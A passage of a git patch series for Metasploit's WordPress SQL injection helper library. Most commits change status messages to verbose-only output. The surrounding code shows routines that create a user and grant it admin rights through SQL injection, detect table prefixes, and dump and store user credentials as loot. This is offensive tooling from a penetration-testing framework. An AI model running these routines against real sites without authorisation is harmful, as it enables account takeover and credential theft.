Metasploit::Model::Login::Status::UNTRIED }) + + print_good("{WPSQLi} Credential for user '#{user[0]}' created successfully.") end print_status('{WPSQLi} Dumped user data:') @@ -170,6 +170,30 @@ def wordpress_sqli_get_users_credentials(count = 10) print_good("Loot saved to: #{loot_path}") + print_status('{WPSQLi} Reporting host...') + report_host(host: datastore['RHOST']) + + print_status('{WPSQLi} Reporting service...') + report_service( + host: datastore['RHOST'], + port: datastore['RPORT'], + proto: 'tcp', + name: fullname, + info: description.strip + ) + + print_status('{WPSQLi} Reporting vulnerability...') + report_vuln( + host: datastore['RHOST'], + port: datastore['RPORT'], + proto: 'tcp', + name: fullname, + refs: references, + info: description.strip + ) + + print_good('{WPSQLi} Reporting completed successfully.') + return data end end From d01e8d4dd564da9e5c3b46854d27523da4f9ec79 Mon Sep 17 00:00:00 2001 From: Valentin Lobstein <88535377+Chocapikk@users.noreply.github.com> Date: Wed, 9 Oct 2024 00:03:23 +0200 Subject: [PATCH 12/22] Update lib/msf/core/exploit/remote/http/wordpress/sqli.rb Co-authored-by: Diego Ledda --- lib/msf/core/exploit/remote/http/wordpress/sqli.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/lib/msf/core/exploit/remote/http/wordpress/sqli.rb b/lib/msf/core/exploit/remote/http/wordpress/sqli.rb index d77236f236d4..1ae08c3c8b31 100644 --- a/lib/msf/core/exploit/remote/http/wordpress/sqli.rb +++ b/lib/msf/core/exploit/remote/http/wordpress/sqli.rb @@ -52,7 +52,7 @@ def wordpress_sqli_create_user(username, password, email) @sqli.raw_run_sql(query.strip.gsub(/\s+/, ' ')) - print_status("{WPSQLi} User '#{username}' created or updated successfully.") + vprint_status("{WPSQLi} User '#{username}' created or updated successfully.") end # Grant admin privileges to the specified user by creating or updating the appropriate meta entry. From 8cbe572f49e52f9c2053e56ab65072f8f1ff7e37 Mon Sep 17 00:00:00 2001 From: Valentin Lobstein <88535377+Chocapikk@users.noreply.github.com> Date: Wed, 9 Oct 2024 00:03:32 +0200 Subject: [PATCH 13/22] Update lib/msf/core/exploit/remote/http/wordpress/sqli.rb Co-authored-by: Diego Ledda --- lib/msf/core/exploit/remote/http/wordpress/sqli.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/lib/msf/core/exploit/remote/http/wordpress/sqli.rb b/lib/msf/core/exploit/remote/http/wordpress/sqli.rb index 1ae08c3c8b31..6d1e8627420c 100644 --- a/lib/msf/core/exploit/remote/http/wordpress/sqli.rb +++ b/lib/msf/core/exploit/remote/http/wordpress/sqli.rb @@ -114,7 +114,7 @@ def wordpress_sqli_identify_table_prefix return nil end - print_status("{WPSQLi} Custom table prefix detected: '#{prefix}'") + vprint_status("{WPSQLi} Custom table prefix detected: '#{prefix}'") prefix end From c1521633f4df6eb8b6f032be4e1f2a56bdd166a6 Mon Sep 17 00:00:00 2001 From: Valentin Lobstein <88535377+Chocapikk@users.noreply.github.com> Date: Wed, 9 Oct 2024 00:03:42 +0200 Subject: [PATCH 14/22] Update lib/msf/core/exploit/remote/http/wordpress/sqli.rb Co-authored-by: Diego Ledda --- lib/msf/core/exploit/remote/http/wordpress/sqli.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/lib/msf/core/exploit/remote/http/wordpress/sqli.rb b/lib/msf/core/exploit/remote/http/wordpress/sqli.rb index 6d1e8627420c..d74edbbb8c14 100644 --- a/lib/msf/core/exploit/remote/http/wordpress/sqli.rb +++ b/lib/msf/core/exploit/remote/http/wordpress/sqli.rb @@ -75,7 +75,7 @@ def wordpress_sqli_grant_admin_privileges(username) SQL @sqli.raw_run_sql(admin_query.strip.gsub(/\s+/, ' ')) - print_status("{WPSQLi} Admin privileges granted or updated for user '#{username}'.") + vprint_status("{WPSQLi} Admin privileges granted or updated for user '#{username}'.") end # Identify the table prefix for the WordPress installation From 31a66d537b8547cc3d6d5b4fdb91c230f9bdd0f8 Mon Sep 17 00:00:00 2001 From: Valentin Lobstein <88535377+Chocapikk@users.noreply.github.com> Date: Wed, 9 Oct 2024 00:03:52 +0200 Subject: [PATCH 15/22] Update lib/msf/core/exploit/remote/http/wordpress/sqli.rb Co-authored-by: Diego Ledda --- lib/msf/core/exploit/remote/http/wordpress/sqli.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/lib/msf/core/exploit/remote/http/wordpress/sqli.rb b/lib/msf/core/exploit/remote/http/wordpress/sqli.rb index d74edbbb8c14..85c8523c7fc8 100644 --- a/lib/msf/core/exploit/remote/http/wordpress/sqli.rb +++ b/lib/msf/core/exploit/remote/http/wordpress/sqli.rb @@ -89,7 +89,7 @@ def wordpress_sqli_identify_table_prefix result = @sqli.run_sql(default_prefix_check)&.to_i if result == indicator - print_status("{WPSQLi} Retrieved default table prefix: 'wp_'") + vprint_status("{WPSQLi} Retrieved default table prefix: 'wp_'") return 'wp_' end print_status('{WPSQLi} Default prefix not found, attempting to detect custom table prefix...') From 3987a761e7555dc3c17d7b52dd6115556c0819eb Mon Sep 17 00:00:00 2001 From: Valentin Lobstein <88535377+Chocapikk@users.noreply.github.com> Date: Wed, 9 Oct 2024 00:04:01 +0200 Subject: [PATCH 16/22] Update lib/msf/core/exploit/remote/http/wordpress/sqli.rb Co-authored-by: Diego Ledda --- lib/msf/core/exploit/remote/http/wordpress/sqli.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/lib/msf/core/exploit/remote/http/wordpress/sqli.rb b/lib/msf/core/exploit/remote/http/wordpress/sqli.rb index 85c8523c7fc8..7fb5bbad11c6 100644 --- a/lib/msf/core/exploit/remote/http/wordpress/sqli.rb +++ b/lib/msf/core/exploit/remote/http/wordpress/sqli.rb @@ -92,7 +92,7 @@ def wordpress_sqli_identify_table_prefix vprint_status("{WPSQLi} Retrieved default table prefix: 'wp_'") return 'wp_' end - print_status('{WPSQLi} Default prefix not found, attempting to detect custom table prefix...') + vprint_status('{WPSQLi} Default prefix not found, attempting to detect custom table prefix...') query = <<-SQL SELECT LEFT(table_name, LENGTH(table_name) - LENGTH('users')) From de5324e1603cc420ebde6fdba53d72fc018e7479 Mon Sep 17 00:00:00 2001 From: Valentin Lobstein <88535377+Chocapikk@users.noreply.github.com> Date: Wed, 9 Oct 2024 00:04:13 +0200 Subject: [PATCH 17/22] Update lib/msf/core/exploit/remote/http/wordpress/sqli.rb Co-authored-by: Diego Ledda --- lib/msf/core/exploit/remote/http/wordpress/sqli.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/lib/msf/core/exploit/remote/http/wordpress/sqli.rb b/lib/msf/core/exploit/remote/http/wordpress/sqli.rb index 7fb5bbad11c6..8caa9d9f9054 100644 --- a/lib/msf/core/exploit/remote/http/wordpress/sqli.rb +++ b/lib/msf/core/exploit/remote/http/wordpress/sqli.rb @@ -173,7 +173,7 @@ def wordpress_sqli_get_users_credentials(count = 10) print_status('{WPSQLi} Reporting host...') report_host(host: datastore['RHOST']) - print_status('{WPSQLi} Reporting service...') + vprint_status('{WPSQLi} Reporting service...') report_service( host: datastore['RHOST'], port: datastore['RPORT'], From 6c048df53f5ad0707c4cd8ff935ebd9458d8ee86 Mon Sep 17 00:00:00 2001 From: Valentin Lobstein <88535377+Chocapikk@users.noreply.github.com> Date: Wed, 9 Oct 2024 00:04:23 +0200 Subject: [PATCH 18/22] Update lib/msf/core/exploit/remote/http/wordpress/sqli.rb Co-authored-by: Diego Ledda --- lib/msf/core/exploit/remote/http/wordpress/sqli.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/lib/msf/core/exploit/remote/http/wordpress/sqli.rb b/lib/msf/core/exploit/remote/http/wordpress/sqli.rb index 8caa9d9f9054..a627495632a0 100644 --- a/lib/msf/core/exploit/remote/http/wordpress/sqli.rb +++ b/lib/msf/core/exploit/remote/http/wordpress/sqli.rb @@ -182,7 +182,7 @@ def wordpress_sqli_get_users_credentials(count = 10) info: description.strip ) - print_status('{WPSQLi} Reporting vulnerability...') + vprint_status('{WPSQLi} Reporting vulnerability...') report_vuln( host: datastore['RHOST'], port: datastore['RPORT'], From 94145eafe9a869e0d471262f94b4bee974747501 Mon Sep 17 00:00:00 2001 From: Valentin Lobstein <88535377+Chocapikk@users.noreply.github.com> Date: Wed, 9 Oct 2024 00:04:32 +0200 Subject: [PATCH 19/22] Update lib/msf/core/exploit/remote/http/wordpress/sqli.rb Co-authored-by: Diego Ledda --- lib/msf/core/exploit/remote/http/wordpress/sqli.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/lib/msf/core/exploit/remote/http/wordpress/sqli.rb b/lib/msf/core/exploit/remote/http/wordpress/sqli.rb index a627495632a0..ad9a3603fe55 100644 --- a/lib/msf/core/exploit/remote/http/wordpress/sqli.rb +++ b/lib/msf/core/exploit/remote/http/wordpress/sqli.rb @@ -153,7 +153,7 @@ def wordpress_sqli_get_users_credentials(count = 10) status: Metasploit::Model::Login::Status::UNTRIED }) - print_good("{WPSQLi} Credential for user '#{user[0]}' created successfully.") + vprint_good("{WPSQLi} Credential for user '#{user[0]}' created successfully.") end print_status('{WPSQLi} Dumped user data:') From fb35f6709a3518bf14bfbf234e4ae3165fe20c10 Mon Sep 17 00:00:00 2001 From: Valentin Lobstein <88535377+Chocapikk@users.noreply.github.com> Date: Wed, 9 Oct 2024 00:04:44 +0200 Subject: [PATCH 20/22] Update lib/msf/core/exploit/remote/http/wordpress/sqli.rb Co-authored-by: Diego Ledda --- lib/msf/core/exploit/remote/http/wordpress/sqli.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/lib/msf/core/exploit/remote/http/wordpress/sqli.rb b/lib/msf/core/exploit/remote/http/wordpress/sqli.rb index ad9a3603fe55..2d817f0e798c 100644 --- a/lib/msf/core/exploit/remote/http/wordpress/sqli.rb +++ b/lib/msf/core/exploit/remote/http/wordpress/sqli.rb @@ -192,7 +192,7 @@ def wordpress_sqli_get_users_credentials(count = 10) info: description.strip ) - print_good('{WPSQLi} Reporting completed successfully.') + vprint_good('{WPSQLi} Reporting completed successfully.') return data end From c15f18631122cb9db2a2dd1d64296a6fb51e2fe7 Mon Sep 17 00:00:00 2001 From: Valentin Lobstein <88535377+Chocapikk@users.noreply.github.com> Date: Wed, 9 Oct 2024 00:04:54 +0200 Subject: [PATCH 21/22] Update lib/msf/core/exploit/remote/http/wordpress/sqli.rb Co-authored-by: Diego Ledda --- lib/msf/core/exploit/remote/http/wordpress/sqli.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/lib/msf/core/exploit/remote/http/wordpress/sqli.rb b/lib/msf/core/exploit/remote/http/wordpress/sqli.rb index 2d817f0e798c..f6f21bbdaff6 100644 --- a/lib/msf/core/exploit/remote/http/wordpress/sqli.rb +++ b/lib/msf/core/exploit/remote/http/wordpress/sqli.rb @@ -156,7 +156,7 @@ def wordpress_sqli_get_users_credentials(count = 10) vprint_good("{WPSQLi} Credential for user '#{user[0]}' created successfully.") end - print_status('{WPSQLi} Dumped user data:') + vprint_status('{WPSQLi} Dumped user data:') print_line(table.to_s) loot_path = store_loot( From c259ce090a16b1838bb3f3616b037f94c8dc1575 Mon Sep 17 00:00:00 2001 From: Valentin Lobstein <88535377+Chocapikk@users.noreply.github.com> Date: Wed, 9 Oct 2024 17:22:33 +0200 Subject: [PATCH 22/22] Update lib/msf/core/exploit/remote/http/wordpress/sqli.rb Co-authored-by: Diego Ledda --- lib/msf/core/exploit/remote/http/wordpress/sqli.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/lib/msf/core/exploit/remote/http/wordpress/sqli.rb b/lib/msf/core/exploit/remote/http/wordpress/sqli.rb index f6f21bbdaff6..7777e0fbf04a 100644 --- a/lib/msf/core/exploit/remote/http/wordpress/sqli.rb +++ b/lib/msf/core/exploit/remote/http/wordpress/sqli.rb @@ -170,7 +170,7 @@ def wordpress_sqli_get_users_credentials(count = 10) print_good("Loot saved to: #{loot_path}") - print_status('{WPSQLi} Reporting host...') + vprint_status('{WPSQLi} Reporting host...') report_host(host: datastore['RHOST']) vprint_status('{WPSQLi} Reporting service...')